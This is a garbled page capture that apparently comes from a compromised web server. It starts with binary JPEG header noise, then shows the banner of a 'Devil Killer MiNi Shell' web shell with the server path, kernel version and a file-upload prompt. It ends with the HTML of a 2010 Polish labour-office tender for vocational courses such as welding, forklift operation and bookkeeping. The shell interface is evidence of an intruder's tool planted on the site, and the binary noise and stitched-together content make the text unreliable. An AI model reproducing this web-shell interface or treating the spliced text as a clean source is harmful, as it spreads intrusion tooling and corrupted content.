JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100505/123406-N-2010.html

<p class="kh_header"><b>Oborniki: Kurs Operator koparko - ładowarek;
Kurs spawacza met. MIG, MAG, TIG;
Kurs Specjalista ds. gospodarki magazynowej z obsługą wózka jezdniowego i komputerową obsługą sprzedaży i magazynu;
Kurs Księgowość komputerowa z elementami kadr i płac w małej i średniej firmie;
Kurs Nowoczesny sprzedawca z obsługą komputera, kas fiskalnych, terminali płatniczych i minimum sanitarnym;
Kurs Podstawy obsługi komputera i kas fiskalnych;
Kurs Prawo jazdy kat. C, C+E;
Kurs krawiecki;
Kurs Bukieciarstwo i aranżacja wnętrz w zakresie kompozycji kwiatowych oraz Decoupage.</b><br>
<b>Numer ogłoszenia: 123406 - 2010; data zamieszczenia: 05.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Obornikach , ul. Sądowa 5, 64-600 Oborniki, woj. wielkopolskie, tel. 0-61 653 66 36, faks 0-61 653 66 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.obornikiwlkp.ibip.pl/public</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kurs Operator koparko - ładowarek;
Kurs spawacza met. MIG, MAG, TIG;
Kurs Specjalista ds. gospodarki magazynowej z obsługą wózka jezdniowego i komputerową obsługą sprzedaży i magazynu;
Kurs Księgowość komputerowa z elementami kadr i płac w małej i średniej firmie;
Kurs Nowoczesny sprzedawca z obsługą komputera, kas fiskalnych, terminali płatniczych i minimum sanitarnym;
Kurs Podstawy obsługi komputera i kas fiskalnych;
Kurs Prawo jazdy kat. C, C+E;
Kurs krawiecki;
Kurs Bukieciarstwo i aranżacja wnętrz w zakresie kompozycji kwiatowych oraz Decoupage..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia oraz zakres programowy.
1.1	Część pierwsza - Kurs Operator koparko - ładowarki
Przedmiot zamówienia
Przedmiotem zamówienia jest teoretyczne i praktyczne przygotowanie uczestników do uzyskania uprawnień na wykonywanie zawodu operatora maszyny do robót ziemnych klasy III określonej specjalizacji, w zakresie koparko-ładowarki.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach, które posiadają wykształcenie minimum podstawowe.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) musi być zgodny z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263) i ma obejmować zajęcia teoretyczne oraz praktyczne.
Część teoretyczna kursu ma obejmować zagadnienia z zakresu:
-	dokumentacji technicznej maszyn roboczych,
-	bezpieczeństwa i higieny pracy przy eksploatacji maszyn roboczych,
-	technologii wykonywania robót ziemnych,
-	użytkowania i obsługi maszyn roboczych.
Część praktyczna kursu ma obejmować naukę eksploatacji maszyn roboczych w różnych warunkach terenowych i technologicznych.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.

1.2	Część druga - Kurs Spawacza met. MIG, MAG, TIG
Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu spawania metodą MIG (spawanie elektrodą topliwą w osłonie gazów objętych aluminium), spawania metodą MAG (spawanie elektrodą topliwą w osłonie gazów aktywnych), spawania metodą TIG (wykonywanie spoin pachwinowych złączy blach i rur). Celem szkolenia jest przygotowanie kursantów do egzaminu końcowego według Wytycznych Instytutu Spawalnictwa, a w dalszym etapie do podjęcia zatrudnienia w charakterze spawacza poprzez umożliwienie uczestnikom kursu zdobycia wiedzy i umiejętności w zakresie wykonywania spoin w obrębie wskazanej metody.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach, które posiadają wykształcenie minimum podstawowe, w szczególności osób z wykształceniem zawodowym o kierunkach mechanicznych. 
Każda osoba skierowana na kurs winna nabyć umiejętności we wskazanej metodzie spawania, w zakresie umożliwiającym przystąpienie do egzaminu końcowego.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) ma uwzględniać zróżnicowany poziom kwalifikacji i wiedzy uczestników szkolenia oraz obejmować wiadomości i umiejętności zgodne z Wytycznymi Instytutu Spawalnictwa w Gliwicach.

1.3 Część trzecia - Kurs Specjalista ds. gospodarki magazynowej z obsługą wózka jezdniowego i komputerową obsługą sprzedaży i magazynu
Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu Specjalista ds. gospodarki magazynowej z obsługą wózka jezdniowego i komputerową obsługą sprzedaży i magazynu. Zakres tematyczny kursu obejmuje wiadomości o dozorze technicznym, klasyfikację, budowę i eksploatację wózków, wiadomości z zakresu BHP oraz naukę jazdy i manewrowania. Celem szkolenia jest uzyskanie przez uczestników uprawnień operatora wózków jezdniowych z napędem silnikowym oraz uprawnień na bezpieczną wymianę butli gazowej przy wózkach napędzanych gazem. 
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach, które mają ukończoną szkołę co najmniej podstawową.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. (Dz. U. nr 70, poz. 650) w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym musi odpowiadać ramowemu programowi nauczania opracowanemu przez Ośrodek Doskonalenia Kadr w Mysłowicach nadzorowany przez Ministra właściwego ds. gospodarki i ma obejmować zajęcia teoretyczne i praktyczne w zakresie:
-	typy stosowanych wózków jezdniowych,
-	budowa wózka,
-	czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
-	czynności kierowcy w czasie pracy wózkami, 
-	wiadomości z zakresu ładunkoznawstwa,
-	wiadomości z zakresu bhp,
-	praktyczna nauka jazdy,
-	wiadomości o dozorze technicznym,
-	przygotowanie kierowców do wykonywania czynności związanych z wymianą butli,
-	samodzielna wymiana butli.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.

1.4	Część czwarta - Kurs Księgowość komputerowa z elementami kadr i płac w małej i średniej firmie
Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu Księgowość komputerowa z elementami kadr i plac w małej i średniej firmie. Celem kursu jest przekazanie niezbędnej wiedzy teoretycznej jak i praktycznej z zakresu elektronicznej obsługi kadr i płac w firmie wraz z programem Symfonia oraz Płatnik ZUS. Jest przygotowany zarówno dla osób chcących zostać pracownikami kadrowo - płacowymi jak i dla osób pracujących na co dzień na innych stanowiskach związanych z kadrami, płacami i księgowością. 
Duży nacisk jest skoncentrowany na elektronicznej obsłudze działu kadr i płac w pakiecie Symfonia, programach Płatnik oraz MS-Excel. 
Istotny jest także spory blok wiadomości teoretycznych z zakresu kadr i płac oraz ubezpieczeń społecznych włączony w program kursu podczas, którego słuchacz zapoznaje się z obowiązującymi przepisami i procedurami regulującymi funkcjonowanie kadr i płac.
W programie m.in.: kadry i płace, ubezpieczenia społeczne, prawo pracy, komputerowa obsługa kadr i płac w pakiecie SYMFONIA, obsługa programu PŁATNIK ZUS, MS Excel w zastosowaniach kadrowo-płacowych.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach, które mają ukończoną szkołę co najmniej szkołę średnią. 
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien zawierać zagadnienia m.in. w zakresie:
-	elektronicznej obsługi kadr i płac w firmie,
-	program Symfonia oraz Płatnik ZUS.
Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.

1.5	Część piąta - Kurs Nowoczesny sprzedawca z obsługą komputera, kas fiskalnych, terminali płatniczych i minimum sanitarnym
Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu Nowoczesny sprzedawca z obsługą komputera, kas fiskalnych, terminali płatniczych i minimum sanitarnym. Celem szkolenia jest przyuczenie do zawodu sprzedawcy - handlowca, z umiejętnością obsługi kasy fiskalnej i komputera. Przygotowywanie uczestników szkolenia m.in. w zakresie: przestrzegania zasad higieny pracy i bezpieczeństwa, organizacja handlu w gospodarce rynkowej, organizacja sprzedaży detalicznej, wykonywanie i dokumentowanie podstawowych obliczeń sklepowych. Poznanie przez słuchaczy teoretycznych zagadnień związanych z stosowaniem kas fiskalnych i terminali płatniczych. Opanowanie praktycznej obsługi kasy i terminali. Nauka obsługi programów komputerowych z pakietów Symfonia SAGE oraz Subiekt w zakresie fakturowania komputerowego, komputerowej obsługi procesu sprzedaży. Nabycie wiedzy z zakresu wymagań sanitarnych w handlu.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach, które mają ukończoną szkołę co najmniej szkołę średnią. 
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien zawierać zagadnienia m.in. w zakresie:
-	nabycie umiejętności z zakresu wymagań sanitarnych w handlu,
-	obsługa kas fiskalnych i terminali,
-	nauka obsługi programów komputerowych z pakietem Symfonia SAGE.
Program szkolenia powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl. 
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia.

1.6	Część szósta - Kurs Podstawy obsługi komputera i kas fiskalnych
Przedmiot zamówienia 
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu Podstawy obsługi komputera i kas fiskalnych. Celem szkolenia jest przygotowanie uczestników do nabycia umiejętności obsługi komputera w zakresie podstawowego oprogramowania oraz obsługi kas fiskalnych. Nabycie wiedzy z zakresu wymagań sanitarnych w handlu.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
Ponadto moduł obsługi kas fiskalnych ma zapewnić uczestnikom kursu zdobycie teoretycznych oraz praktycznych umiejętności między innymi w zakresie: 
- przepisów BHP i p. poż., 
- budowy i obsługi kasy fiskalnej,
- sprzedaży towarów na kasie fiskalnej,
- drukowania raportów ze sprzedaży, 
- zasad programowania kasy fiskalnej.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu.

1.7	Część siódma Prawo jazdy kat. C, C+E
Przedmiot zamówienia
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu Prawa jazdy kat. C, C+E. Celem szkolenia jest przygotowanie uczestników do nabycia umiejętności teoretycznej i praktycznej w zakresie prawa jazdy kat. C, C+E.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu.

1.8	Część ósma Kurs krawiecki
Przedmiot zamówienia 
Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu z zakresu krawiectwa. Celem szkolenia jest przygotowanie uczestników do pracy w krawiectwie z obsługą maszyn przemysłowych oraz zagadnienia z zakresu umiejętności poszukiwania pracy.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników kursu.

1.9	Część dziewiąta Bukieciarstwo i aranżacja wnętrz w zakresie kompozycji kwiatowych oraz Decoupage
Przedmiot zamówienia 
Przedmiotem zamówienia jest teoretyczne i praktyczne przygotowanie uczestników do uzyskania umiejętności niezbędnych do pracy w kwiaciarni, uwzględniając najnowsze trendy w bukieciarstwie i aktualne zapotrzebowania rynku. Ponadto uczestnicy kursu mają zdobyć umiejętności Decoupage na różnorodnych powierzchniach.
Szkolenie skierowane jest do osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Obornikach.
Zakres programowy szkolenia
Program szkolenia (należy wypełnić załącznik nr 4 i 5) powinien wykorzystywać standardy kwalifikacji zawodowych i modułowy program szkolenia zawodowego związanego z tematyką kursu, dostępny w bazie danych Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.qov.pl dla zawodu Bukieciarz. Kursanci powinni zdobyć wiedzę oraz praktyczne umiejętności w zakresie:
-	wykonania dowolnego wyrobu bukieciarskiego na życzenie klienta (kompozycja ślubna, żałobna, okolicznościowa, itp.),
-	zaprojektowania i wykonania kompozycji kwiatowej w naczyniach,
-	zebrania i utrwalenia roślin żywych oraz wykorzystywania ich w kompozycjach kwiatowych. 
Sposób prowadzenia zajęć powinien być zróżnicowany i uwzględniać poziom uczestników szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w przypadku osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy.
Wpis instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualny na rok 2010.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/nie spełnia. W przypadku weryfikacji warunku posiadania wiedzy i doświadczenia Zamawiający będzie oceniać liczbę przeprowadzonych szkoleń na podstawie dołączonych listów referencyjnych lub innych dokumentów potwierdzających należyte zrealizowanie szkolenia wg skali ocen:
1 - 5 szkolenia - 25 punktów, 
6 - 10 szkoleń - 50 punktów, 
11 - 15 szkoleń - 75 punktów, 
16 i więcej szkoleń - 100 punktów;
uzyskane punkty zostaną pomnożone przez wagę kryterium, tj. 20%.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
